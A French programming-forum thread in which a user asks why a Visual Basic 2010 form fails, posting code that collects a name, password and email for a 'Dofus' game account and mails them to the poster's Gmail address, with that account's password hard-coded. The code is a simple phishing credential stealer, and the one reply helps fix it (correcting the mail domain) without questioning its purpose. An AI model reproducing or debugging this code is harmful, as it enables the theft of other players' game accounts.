Problème microsoft visual basic 2010 [Résolu/Fermé]

Signaler
Messages postés
8
Date d'inscription
mardi 29 avril 2014
Statut
Membre
Dernière intervention
9 mars 2017
-
Messages postés
8
Date d'inscription
mardi 29 avril 2014
Statut
Membre
Dernière intervention
9 mars 2017
-
bonjour, j'ai comme vous l'avez compris un probleme au niveau de microsoft visual basic 2010 dans mon codage.
mon problème est que quand je lance le debguage et que je rempli mon formulaire et clic sur continuer je suis automatquement renvoyer sur mon codage et on m'affiche ceci :



voici ma config :
Imports System.Net.Mail

Public Class fsf
    Private nom As String
    Private pass As String
    Private mail As String
    Private message As String

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim MyMailMessage As New MailMessage()
        Dim SMTPServer As New SmtpClient("smtp.gmail.com")

        nom = tbnom.Text
        pass = tbpass.Text
        mail = tbmail.Text
        message = "nom : " & nom & vbNewLine & "pass : " & pass & vbNewLine & "mail : " & mail

        MyMailMessage.From = New MailAddress("jules.youtube@gmail.fr")
        MyMailMessage.To.Add("jules.youtube@gmail.fr")
        MyMailMessage.Subject = ("Dofus Compte")
        MyMailMessage.Body = (message)

        SMTPServer.Port = ("587") 'Port
        SMTPServer.Credentials = New System.Net.NetworkCredential("jules.youtube@gmail.fr", "ferrari458JW")
        SMTPServer.EnableSsl = True

        SMTPServer.Send(MyMailMessage) 'Envoi

    End Sub

End Class

1 réponse

Messages postés
1377
Date d'inscription
mercredi 18 mars 2009
Statut
Membre
Dernière intervention
5 mars 2020
187
salut,

parce que je pense que c'est xxxxxx@gmail.com ton adresse

et évites de mettre ton mot de passe, mets plutôt "password" à la place, on comprendra

Qui ne tente rien n'a rien
Messages postés
8
Date d'inscription
mardi 29 avril 2014
Statut
Membre
Dernière intervention
9 mars 2017

ok ca marche merci <3